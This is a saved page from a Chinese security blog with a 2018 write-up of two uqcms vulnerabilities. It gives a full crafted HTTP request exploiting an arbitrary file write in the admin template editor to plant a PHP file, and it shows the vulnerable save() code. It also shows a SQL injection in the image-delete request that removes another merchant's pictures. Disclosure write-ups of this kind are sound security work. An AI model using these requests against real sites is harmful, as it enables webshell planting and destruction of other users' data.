<!DOCTYPE html>



  


<html class="theme-next gemini use-motion" lang="zh-Hans">
<head>
  <meta charset="UTF-8"/>
<meta http-equiv="X-UA-Compatible" content="IE=edge" />
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"/>
<meta name="theme-color" content="#222">



  
  
    
    
  <script src="/lib/pace/pace.min.js?v=1.0.2"></script>
  <link href="/lib/pace/pace-theme-flash.min.css?v=1.0.2" rel="stylesheet">







<meta http-equiv="Cache-Control" content="no-transform" />
<meta http-equiv="Cache-Control" content="no-siteapp" />
















  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css" />







<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css" />

<link href="/css/main.css?v=5.1.4" rel="stylesheet" type="text/css" />


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png?v=5.1.4">


  <link rel="mask-icon" href="/images/logo.svg?v=5.1.4" color="#222">





  <meta name="keywords" content="代码审计,0day,Cms漏洞挖掘,白盒审计," />





  <link rel="alternate" href="/atom.xml" title="Cai_Team" type="application/atom+xml" />






<meta name="description" content="qucms是一个B2B2C多商户电商系统  结合多年的电商开发经验推出B2B2C多店铺系统，是目前国内最优秀的电商平台之一，系统设计为“平台自营+供应商入驻”的电商运营模式，系统支持佣金结算、区域团购、实时物流、售后服务等基础功能；为电商运营商提供最优质的系统和服务。 该程序采用非常流行的PHP作为开发语言，给很多广大开发者一个容易上手，能快速进入业务，成熟的语言架构，去除无用直达高效的设计，给企">
<meta name="keywords" content="代码审计,0day,Cms漏洞挖掘,白盒审计">
<meta property="og:type" content="article">
<meta property="og:title" content="uqcms的后台GetShell和前台越权删除他人图片">
<meta property="og:url" content="127.0.0.1/2018/06/03/uqcms的后台GetShell和前台越权删除他人图片/index.html">
<meta property="og:site_name" content="Cai_Team">
<meta property="og:description" content="qucms是一个B2B2C多商户电商系统  结合多年的电商开发经验推出B2B2C多店铺系统，是目前国内最优秀的电商平台之一，系统设计为“平台自营+供应商入驻”的电商运营模式，系统支持佣金结算、区域团购、实时物流、售后服务等基础功能；为电商运营商提供最优质的系统和服务。 该程序采用非常流行的PHP作为开发语言，给很多广大开发者一个容易上手，能快速进入业务，成熟的语言架构，去除无用直达高效的设计，给企">
<meta property="og:locale" content="zh-Hans">
<meta property="og:image" content="http://static.zybuluo.com/1kbfree/5rhe8dglshi1f6zo2a6zcx30/image_1cevu8mj382u1blhvnl1eqk1nri9.png">
<meta property="og:image" content="http://static.zybuluo.com/1kbfree/m3qpdsjbtli4b0yuvfagnca7/image_1cevua1je1t93pa7cfj127jhv16.png">
<meta property="og:image" content="http://static.zybuluo.com/1kbfree/skmc2jt9ydxst5v8qx5lxvp3/image_1cevuf2drd8t1l1e56evn31otg1j.png">
<meta property="og:image" content="http://static.zybuluo.com/1kbfree/q1zt5b9wfa8pzw3ulz1xo01v/image_1cevuh0soqt1imm1icg43m13h820.png">
<meta property="og:image" content="http://static.zybuluo.com/1kbfree/9nm6cx6hllfsnm3jxnfax44k/image_1cevuk0f31pddmhhphu1urj1nvn2d.png">
<meta property="og:image" content="http://static.zybuluo.com/1kbfree/mhq7mmwnvatnrtklvuaojrp3/image_1cevur2sr1nri103u1pss15mf19l92q.png">
<meta property="og:image" content="http://static.zybuluo.com/1kbfree/hs1ow8zedgcsb9tky3sgqsv8/image_1cevuscb0g0i1ccj146918t61n9837.png">
<meta property="og:image" content="http://static.zybuluo.com/1kbfree/z49nss7cfztsupiae1uwdb9j/image_1cevvbsg4vo29pi19jcmst1ftd3k.png">
<meta property="og:image" content="http://static.zybuluo.com/1kbfree/qa4imhcw08688ryzb25skm9x/image_1cevvi0dl17hnhst1nns4j91n3m4h.png">
<meta property="og:image" content="http://static.zybuluo.com/1kbfree/m9ajlrc4vc6w6v36utocmlpm/image_1cevvkj3gt54godvddo68q434u.png">
<meta property="og:image" content="http://static.zybuluo.com/1kbfree/3j8beyrhld9vq3fyv0pnmf3z/image_1cf0ctl1g1rj513371i61v5k5bv9.png">
<meta property="og:image" content="http://static.zybuluo.com/1kbfree/5d2bkrbuyrblhiloj4yqhl8r/image_1cf0cuvu7f2225011akh3n6egm.png">
<meta property="og:image" content="http://static.zybuluo.com/1kbfree/6gml7d0kw30alawf5a3vixo0/image_1cf0d0f9r10p21rrm14pk576i213.png">
<meta property="og:image" content="http://static.zybuluo.com/1kbfree/p0q1340u6cna6wtqcehdvrdm/image_1cf0d48umhlifkd10g9poj17vf20.png">
<meta property="og:image" content="http://static.zybuluo.com/1kbfree/vs6qmp1rqhgtwtxujf008arj/image_1cf0d6kkfr7518cvk5lm1t1bja2d.png">
<meta property="og:image" content="http://static.zybuluo.com/1kbfree/07cx81dknqfgq9z6nlp53bpk/image_1cf0e57anq5rjs1131tj431m6u2q.png">
<meta property="og:image" content="http://static.zybuluo.com/1kbfree/0smw4ibe5qo15yet4wb62hv5/image_1cf0ea13g1oag25u1st01dsk1oob37.png">
<meta property="og:image" content="http://static.zybuluo.com/1kbfree/z88pbselrnp64czvlxvzvz52/image_1cf0ehv65i57hfmpth1qdjct3k.png">
<meta property="og:image" content="http://static.zybuluo.com/1kbfree/mlqrnissvouj49pwufitq5ak/image_1cf0em241145v1nd7lg11femt0a41.png">
<meta property="og:image" content="http://static.zybuluo.com/1kbfree/yjcup6bc7ouudlnnpd1tb9bl/image_1cf0emvus1lq91rm6fls17jpfq04u.png">
<meta property="og:updated_time" content="2018-06-03T04:25:27.623Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="uqcms的后台GetShell和前台越权删除他人图片">
<meta name="twitter:description" content="qucms是一个B2B2C多商户电商系统  结合多年的电商开发经验推出B2B2C多店铺系统，是目前国内最优秀的电商平台之一，系统设计为“平台自营+供应商入驻”的电商运营模式，系统支持佣金结算、区域团购、实时物流、售后服务等基础功能；为电商运营商提供最优质的系统和服务。 该程序采用非常流行的PHP作为开发语言，给很多广大开发者一个容易上手，能快速进入业务，成熟的语言架构，去除无用直达高效的设计，给企">
<meta name="twitter:image" content="http://static.zybuluo.com/1kbfree/5rhe8dglshi1f6zo2a6zcx30/image_1cevu8mj382u1blhvnl1eqk1nri9.png">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Gemini',
    version: '5.1.4',
    sidebar: {"position":"left","display":"post","offset":12,"b2t":false,"scrollpercent":false,"onmobile":false},
    fancybox: true,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    duoshuo: {
      userId: '0',
      author: '博主'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="127.0.0.1/2018/06/03/uqcms的后台GetShell和前台越权删除他人图片/"/>





<script>
    (function () {
        if ('Cai_Team_pass_word_me') {
            if (prompt('请输入文章密码') !== 'Cai_Team_pass_word_me') {
                alert('大哥你好，这是内部文章或未写全文章( 我要脸 )，如果没有密码请不要访问，感谢~');
                if (history.length === 1) {
                    location.replace("https://flagiamfree.github.io/"); //首页
                } else {
                    history.back();
                }
            }
        }
    })();
</script>


  <script>
  (function(i,s,o,g,r,a,m){i["DaoVoiceObject"]=r;i[r]=i[r]||function(){(i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;a.charset="utf-8";m.parentNode.insertBefore(a,m)})(window,document,"script",('https:' == document.location.protocol ? 'https:' : 'http:') + "//widget.daovoice.io/widget/0f81ff2f.js","daovoice")
  daovoice('init', {
    app_id: "8827fd59"
  });
  daovoice('update');
  </script>

  <title>uqcms的后台GetShell和前台越权删除他人图片 | Cai_Team</title>
  








</head>


<body itemscope itemtype="http://schema.org/WebPage" lang="zh-Hans">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/"  class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">Cai_Team</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <p class="site-subtitle">十年寒窗如一日，一举成名天下知</p>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br />
            
            首页
          </a>
        </li>
      
        
        <li class="menu-item menu-item-about">
          <a href="/about/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-user"></i> <br />
            
            介绍
          </a>
        </li>
      
        
        <li class="menu-item menu-item-tags">
          <a href="/tags/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-tags"></i> <br />
            
            标签
          </a>
        </li>
      
        
        <li class="menu-item menu-item-categories">
          <a href="/categories/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-th"></i> <br />
            
            分类
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br />
            
            归档
          </a>
        </li>
      

      
        <li class="menu-item menu-item-search">
          
            <a href="javascript:;" class="popup-trigger">
          
            
              <i class="menu-item-icon fa fa-search fa-fw"></i> <br />
            
            搜索
          </a>
        </li>
      
    </ul>
  

  
    <div class="site-search">
      
  <div class="popup search-popup local-search-popup">
  <div class="local-search-header clearfix">
    <span class="search-icon">
      <i class="fa fa-search"></i>
    </span>
    <span class="popup-btn-close">
      <i class="fa fa-times-circle"></i>
    </span>
    <div class="local-search-input-wrapper">
      <input autocomplete="off"
             placeholder="搜索..." spellcheck="false"
             type="text" id="local-search-input">
    </div>
  </div>
  <div id="local-search-result"></div>
</div>



    </div>
  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="127.0.0.1/2018/06/03/uqcms的后台GetShell和前台越权删除他人图片/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="">
      <meta itemprop="description" content="">
      <meta itemprop="image" content="/images/cai_font.png"> 
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Cai_Team">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">uqcms的后台GetShell和前台越权删除他人图片</h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">发表于</span>
              
              <time title="创建于" itemprop="dateCreated datePublished" datetime="2018-06-03T12:06:17+08:00">
                2018-06-03
              </time>
            

            

            
          </span>

          
            <span class="post-category" >
            
              <span class="post-meta-divider">|</span>
            
              <span class="post-meta-item-icon">
                <i class="fa fa-folder-o"></i>
              </span>
              
                <span class="post-meta-item-text">分类于</span>
              
              
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/Web攻防/" itemprop="url" rel="index">
                    <span itemprop="name">Web攻防</span>
                  </a>
                </span>

                
                
              
            </span>
          

          
            
              <span class="post-comments-count">
                <span class="post-meta-divider">|</span>
                <span class="post-meta-item-icon">
                  <i class="fa fa-comment-o"></i>
                </span>
                <a href="/2018/06/03/uqcms的后台GetShell和前台越权删除他人图片/#comments" itemprop="discussionUrl">
                  <span class="post-comments-count valine-comment-count" data-xid="/2018/06/03/uqcms的后台GetShell和前台越权删除他人图片/" itemprop="commentCount"></span>
                </a>
              </span>
            
          

          
          

          
            <span class="post-meta-divider">|</span>
            <span class="page-pv">本文浏览数 <i class="fa fa-file-o"></i>
            <span class="busuanzi-value" id="busuanzi_value_page_pv" ></span>次~
            </span>
          

          
            <div class="post-wordcount">
              
                
                <span class="post-meta-item-icon">
                  <i class="fa fa-file-word-o"></i>
                </span>
                
                  <span class="post-meta-item-text">字数统计&#58;</span>
                
                <span title="字数统计">
                  813
                </span>
              

              

              
            </div>
          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <blockquote class="blockquote-center"><p>qucms是一个B2B2C多商户电商系统 </p>
<p>结合多年的电商开发经验推出B2B2C多店铺系统，是目前国内最优秀的电商平台之一，系统设计为“平台自营+供应商入驻”的电商运营模式，系统支持佣金结算、区域团购、实时物流、售后服务等基础功能；为电商运营商提供最优质的系统和服务。 该程序采用非常流行的PHP作为开发语言，给很多广大开发者一个容易上手，能快速进入业务，成熟的语言架构，去除无用直达高效的设计，给企业快速开发，赢的市场。</p>
</blockquote>
<a id="more"></a>
<h2 id="1-后台GETSHELL"><a href="#1-后台GETSHELL" class="headerlink" title="1. 后台GETSHELL"></a>1. 后台GETSHELL</h2><p><strong>打开URL<code>www.yousite.xxx?m=template</code>后，呈现这个页面:</strong><br><img src="http://static.zybuluo.com/1kbfree/5rhe8dglshi1f6zo2a6zcx30/image_1cevu8mj382u1blhvnl1eqk1nri9.png" alt="image_1cevu8mj382u1blhvnl1eqk1nri9.png-43.8kB"><br><em>点击进入目录</em></p>
<p><img src="http://static.zybuluo.com/1kbfree/m3qpdsjbtli4b0yuvfagnca7/image_1cevua1je1t93pa7cfj127jhv16.png" alt="image_1cevua1je1t93pa7cfj127jhv16.png-95.5kB"><br><em>随便点击一个编辑，然后用<code>Burp</code>抓包( 用不用都可以 )</em></p>
<p><img src="http://static.zybuluo.com/1kbfree/skmc2jt9ydxst5v8qx5lxvp3/image_1cevuf2drd8t1l1e56evn31otg1j.png" alt="image_1cevuf2drd8t1l1e56evn31otg1j.png-106.9kB"><br><em>单击提交后用<code>Burp</code>抓包，抓到的数据如下图</em></p>
<p><img src="http://static.zybuluo.com/1kbfree/q1zt5b9wfa8pzw3ulz1xo01v/image_1cevuh0soqt1imm1icg43m13h820.png" alt="image_1cevuh0soqt1imm1icg43m13h820.png-173.1kB"><br><em>我们将<code>filename</code>修改为<code>phpinfo.php</code>，把<code>content</code>修改为<code>&lt;?php phpinfo();?&gt;</code></em></p>
<p><img src="http://static.zybuluo.com/1kbfree/9nm6cx6hllfsnm3jxnfax44k/image_1cevuk0f31pddmhhphu1urj1nvn2d.png" alt="image_1cevuk0f31pddmhhphu1urj1nvn2d.png-52.6kB"></p>
<p><strong>修改后的数据包:</strong><br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line">POST /admin.php?m=template&amp;a=save&amp;jq_time=1527933067821 HTTP/1.1</span><br><span class="line">Host: www.iamfree.ccc</span><br><span class="line">User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0</span><br><span class="line">Accept: */*</span><br><span class="line">Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3</span><br><span class="line">Accept-Encoding: gzip, deflate</span><br><span class="line">DNT: 1</span><br><span class="line">Content-Type: application/x-www-form-urlencoded; charset=UTF-8</span><br><span class="line">X-Requested-With: XMLHttpRequest</span><br><span class="line">Referer: http://www.iamfree.ccc/admin.php?m=template&amp;a=edit&amp;path=default.top.html</span><br><span class="line">Content-Length: 2886</span><br><span class="line">Cookie: PHPSESSID=b3uto19lpaa0mbbg4rudn9oqt0; goods[cart]=180602173948571025</span><br><span class="line">Connection: close</span><br><span class="line"></span><br><span class="line">filename=phpinfo.php&amp;content=&lt;?php phpinfo();?&gt;</span><br></pre></td></tr></table></figure></p>
<p>然后就会在根目录创建一个名为<code>phpinfo.php</code>的文件，并且内容为<code>&lt;?php phpinfo();?&gt;</code><br><img src="http://static.zybuluo.com/1kbfree/mhq7mmwnvatnrtklvuaojrp3/image_1cevur2sr1nri103u1pss15mf19l92q.png" alt="image_1cevur2sr1nri103u1pss15mf19l92q.png-80.8kB"></p>
<p><strong>访问<code>phpinfo.php</code>文件，完成GETSHELL</strong>:<br><img src="http://static.zybuluo.com/1kbfree/hs1ow8zedgcsb9tky3sgqsv8/image_1cevuscb0g0i1ccj146918t61n9837.png" alt="image_1cevuscb0g0i1ccj146918t61n9837.png-75.1kB"></p>
<h3 id="漏洞代码处："><a href="#漏洞代码处：" class="headerlink" title="漏洞代码处："></a>漏洞代码处：</h3><p><img src="http://static.zybuluo.com/1kbfree/z49nss7cfztsupiae1uwdb9j/image_1cevvbsg4vo29pi19jcmst1ftd3k.png" alt="image_1cevvbsg4vo29pi19jcmst1ftd3k.png-147kB"><br><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">save</span><span class="params">()</span> </span>&#123;</span><br><span class="line">        <span class="keyword">if</span> ($_POST) &#123;</span><br><span class="line">            $file = P(<span class="string">'filename'</span>, <span class="string">'修改的文件名不能为空'</span>);</span><br><span class="line">            $content = P(<span class="string">'content'</span>);</span><br><span class="line">            $query = file_put_contents($file, stripslashes_deep($content)); </span><br><span class="line">            <span class="keyword">if</span> ($query) &#123;</span><br><span class="line">                right_json();</span><br><span class="line">            &#125; <span class="keyword">else</span> &#123;</span><br><span class="line">                error_json(<span class="string">'保存失败'</span>);</span><br><span class="line">            &#125;</span><br><span class="line">        &#125; <span class="keyword">else</span> &#123;</span><br><span class="line">            error_json(<span class="string">'提交错误'</span>);</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br></pre></td></tr></table></figure></p>
<h4 id="加上这三段代码，便于调试"><a href="#加上这三段代码，便于调试" class="headerlink" title="加上这三段代码，便于调试"></a>加上这三段代码，便于调试</h4><p><img src="http://static.zybuluo.com/1kbfree/qa4imhcw08688ryzb25skm9x/image_1cevvi0dl17hnhst1nns4j91n3m4h.png" alt="image_1cevvi0dl17hnhst1nns4j91n3m4h.png-47.8kB"></p>
<h4 id="把Burp抓的包放到Repeater-按住ctrl-r-模块里"><a href="#把Burp抓的包放到Repeater-按住ctrl-r-模块里" class="headerlink" title="把Burp抓的包放到Repeater( 按住ctrl+r )模块里"></a>把<code>Burp</code>抓的包放到<code>Repeater</code>( 按住ctrl+r )模块里</h4><p><img src="http://static.zybuluo.com/1kbfree/m9ajlrc4vc6w6v36utocmlpm/image_1cevvkj3gt54godvddo68q434u.png" alt="image_1cevvkj3gt54godvddo68q434u.png-82.5kB"><br><em><code>file_put_contents</code></em>的返回值是第二个参数的长度</p>
<p><em>这里因为没有做任何过滤，所以这里导致了任意文件写入漏洞</em></p>
<h2 id="前台任意删除他人图片"><a href="#前台任意删除他人图片" class="headerlink" title="前台任意删除他人图片:"></a>前台任意删除他人图片:</h2><h3 id="漏洞处"><a href="#漏洞处" class="headerlink" title="漏洞处:"></a>漏洞处:</h3><ol>
<li><p>进入商家登陆<br><img src="http://static.zybuluo.com/1kbfree/3j8beyrhld9vq3fyv0pnmf3z/image_1cf0ctl1g1rj513371i61v5k5bv9.png" alt="image_1cf0ctl1g1rj513371i61v5k5bv9.png-482.6kB"></p>
</li>
<li><p>登陆后，单击装修<br><img src="http://static.zybuluo.com/1kbfree/5d2bkrbuyrblhiloj4yqhl8r/image_1cf0cuvu7f2225011akh3n6egm.png" alt="image_1cf0cuvu7f2225011akh3n6egm.png-40.9kB"></p>
</li>
<li><p>点击相册列表，并且上传图片<br><img src="http://static.zybuluo.com/1kbfree/6gml7d0kw30alawf5a3vixo0/image_1cf0d0f9r10p21rrm14pk576i213.png" alt="image_1cf0d0f9r10p21rrm14pk576i213.png-56.5kB"></p>
</li>
</ol>
<h3 id="漏洞讲解开始"><a href="#漏洞讲解开始" class="headerlink" title="漏洞讲解开始"></a>漏洞讲解开始</h3><p><strong>首先选择这个ID为<code>1566</code>的那张图片点击删除，并且用<code>Burp</code>进行抓包:</strong><br><img src="http://static.zybuluo.com/1kbfree/p0q1340u6cna6wtqcehdvrdm/image_1cf0d48umhlifkd10g9poj17vf20.png" alt="image_1cf0d48umhlifkd10g9poj17vf20.png-73.2kB"></p>
<p><strong>我们首先随便输入一下错误的语法( 方便看到他的执行了什么语句 ):</strong><br><img src="http://static.zybuluo.com/1kbfree/vs6qmp1rqhgtwtxujf008arj/image_1cf0d6kkfr7518cvk5lm1t1bja2d.png" alt="image_1cf0d6kkfr7518cvk5lm1t1bja2d.png-80kB"></p>
<p>可以看到他执行的SQL语句是:<br><figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">select</span> <span class="keyword">id</span>,shop_id,<span class="keyword">url</span> <span class="keyword">from</span> uq_album <span class="keyword">where</span> shop_id = <span class="number">4</span> <span class="keyword">and</span> <span class="keyword">id</span> = <span class="number">1566</span> <span class="keyword">or</span> xxxx #查询uq_album表中条件为shop_id=<span class="number">4</span>与<span class="keyword">id</span>=<span class="number">1566</span>的<span class="keyword">id</span>和shop_id和<span class="keyword">url</span></span><br></pre></td></tr></table></figure></p>
<p><img src="http://static.zybuluo.com/1kbfree/07cx81dknqfgq9z6nlp53bpk/image_1cf0e57anq5rjs1131tj431m6u2q.png" alt="image_1cf0e57anq5rjs1131tj431m6u2q.png-81.6kB"></p>
<p>我们现在身为<code>test2</code>想把<code>test1</code>的图片删了，那么我们就构造一下sql语句~</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">select</span> <span class="keyword">id</span>,shop_id,<span class="keyword">url</span> <span class="keyword">from</span> uq_album <span class="keyword">where</span> shop_id = <span class="number">4</span> <span class="keyword">and</span> <span class="keyword">id</span> = <span class="number">1566</span> <span class="keyword">or</span> shop_id <span class="keyword">in</span> (<span class="number">5</span>)</span><br></pre></td></tr></table></figure>
<p><img src="http://static.zybuluo.com/1kbfree/0smw4ibe5qo15yet4wb62hv5/image_1cf0ea13g1oag25u1st01dsk1oob37.png" alt="image_1cf0ea13g1oag25u1st01dsk1oob37.png-19.6kB"></p>
<p><em>可以看见这里有3条数据被展现出来了，也就是<code>test2</code>上传的图片</em><br><img src="http://static.zybuluo.com/1kbfree/z88pbselrnp64czvlxvzvz52/image_1cf0ehv65i57hfmpth1qdjct3k.png" alt="image_1cf0ehv65i57hfmpth1qdjct3k.png-84kB"></p>
<p><strong>然后我们开始执行一下这个构造的<code>SQL</code>语句:</strong><br><img src="http://static.zybuluo.com/1kbfree/mlqrnissvouj49pwufitq5ak/image_1cf0em241145v1nd7lg11femt0a41.png" alt="image_1cf0em241145v1nd7lg11femt0a41.png-77.6kB"></p>
<p><strong>然后我们发现那3条数据就没了:</strong><br><img src="http://static.zybuluo.com/1kbfree/yjcup6bc7ouudlnnpd1tb9bl/image_1cf0emvus1lq91rm6fls17jpfq04u.png" alt="image_1cf0emvus1lq91rm6fls17jpfq04u.png-41.6kB"></p>
<h3 id="代码处"><a href="#代码处" class="headerlink" title="代码处:"></a>代码处:</h3><blockquote>
<p>下次补 手机已经扣了4元了 出不起了 </p>
</blockquote>
<blockquote class="blockquote-center"><p>十年寒窗无人问，一举成名天下知<br>                            – Cai_Team</p>
</blockquote>
      
    </div>
    
    
    

    

    <div>
      
        
<div class="my_post_copyright">
  <script src="//cdn.bootcss.com/clipboard.js/1.5.10/clipboard.min.js"></script>
  
  <!-- JS库 sweetalert 可修改路径 -->
  <script src="https://cdn.bootcss.com/jquery/2.0.0/jquery.min.js"></script>
  <script src="https://unpkg.com/sweetalert/dist/sweetalert.min.js"></script>
  <p><span>本文标题:</span><a href="/2018/06/03/uqcms的后台GetShell和前台越权删除他人图片/">uqcms的后台GetShell和前台越权删除他人图片</a></p>

  
      <p><span>文章作者:</span><a href="/" title="访问 Iamfree 的博客">Iamfree</a></p>
      
          <p><span>作者QQ:</span>1900065568</p>
      

  
  

  <p><span>发布时间:</span>2018年06月03日 - 12:06</p>
  <p><span>最后更新:</span>2018年06月03日 - 12:06</p>
  <p><span>原始链接:</span><a href="/2018/06/03/uqcms的后台GetShell和前台越权删除他人图片/" title="uqcms的后台GetShell和前台越权删除他人图片">127.0.0.1/2018/06/03/uqcms的后台GetShell和前台越权删除他人图片/</a>
    <span class="copy-path"  title="点击复制文章链接"><i class="fa fa-clipboard" data-clipboard-text="127.0.0.1/2018/06/03/uqcms的后台GetShell和前台越权删除他人图片/"  aria-label="复制成功！"></i></span>
  </p>
  <p><span>许可协议:</span>暂时请不要转载,感谢！！！</p>  
</div>
<script> 
    var clipboard = new Clipboard('.fa-clipboard');
    $(".fa-clipboard").click(function(){
      clipboard.on('success', function(){
        swal({   
          title: "",   
          text: '复制成功',
          icon: "success", 
          showConfirmButton: true
          });
	});
    });  
</script>

      
    </div>
    
    
      <div>
        <div style="padding: 10px 0; margin: 20px auto; width: 90%; text-align: center;">
  <div>坚持写有质量的原创\转载文章，如果您觉得质量不错的话就点击下面按钮打赏我们把~</div>
  <button id="rewardButton" disable="enable" onclick="var qr = document.getElementById('QR'); if (qr.style.display === 'none') {qr.style.display='block';} else {qr.style.display='none'}">
    <span>打赏</span>
  </button>
  <div id="QR" style="display: none;">

    
      <div id="wechat" style="display: inline-block">
        <img id="wechat_qr" src="/images/wx.jpg" alt=" 微信支付"/>
        <p>微信支付</p>
      </div>
    

    
      <div id="alipay" style="display: inline-block">
        <img id="alipay_qr" src="/images/zfb.jpg" alt=" 支付宝"/>
        <p>支付宝</p>
      </div>
    

    

  </div>
</div>

      </div>
    

    

    <div>
      
        <div> 

	 
		<div style="text-align:center;color: #C5B9B9;font-size:14px;">
			---------------本文结束<i class="fa fa-angellist"></i>感谢您的阅读，喜欢我们的话就加入我们吧~---------------
		</div> 
	 

</div>

      
    </div>
    
    <footer class="post-footer">
      
        <div class="post-tags">
          
            <a href="/tags/代码审计/" rel="tag"><i class="fa fa-tag"></i> 代码审计</a>
          
            <a href="/tags/0day/" rel="tag"><i class="fa fa-tag"></i> 0day</a>
          
            <a href="/tags/Cms漏洞挖掘/" rel="tag"><i class="fa fa-tag"></i> Cms漏洞挖掘</a>
          
            <a href="/tags/白盒审计/" rel="tag"><i class="fa fa-tag"></i> 白盒审计</a>
          
        </div>
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2018/05/27/OSI七层模型/" rel="next" title="OSI七层模型">
                <i class="fa fa-chevron-left"></i> OSI七层模型
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2018/06/04/对chanzhi企业门户系统的一次测试/" rel="prev" title="对chanzhi企业门户系统的一次测试">
                对chanzhi企业门户系统的一次测试 <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>



    <div class="post-spread">
      
        <!-- JiaThis Button BEGIN -->
<div class="jiathis_style">
<span class="jiathis_txt">分享到：</span>
<a class="jiathis_button_fav">收藏夹</a>
<a class="jiathis_button_copy">复制网址</a>
<a class="jiathis_button_email">邮件</a>
<a class="jiathis_button_weixin">微信</a>
<a class="jiathis_button_qzone">QQ空间</a>
<a class="jiathis_button_tqq">腾讯微博</a>
<a class="jiathis_button_douban">豆瓣</a>
<a class="jiathis_button_share">一键分享</a>

<a href="http://www.jiathis.com/share?uid=2140465" class="jiathis jiathis_txt jiathis_separator jtico jtico_jiathis" target="_blank">更多</a>
<a class="jiathis_counter_style"></a>
</div>
<script type="text/javascript" >
var jiathis_config={
  data_track_clickback:true,
  summary:"",
  shortUrl:false,
  hideMore:false
}
</script>
<script type="text/javascript" src="http://v3.jiathis.com/code/jia.js?uid=" charset="utf-8"></script>
<!-- JiaThis Button END -->
      
    </div>
  </div>


          </div>
          


          

  
    <div class="comments" id="comments">
    </div>
  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            文章目录
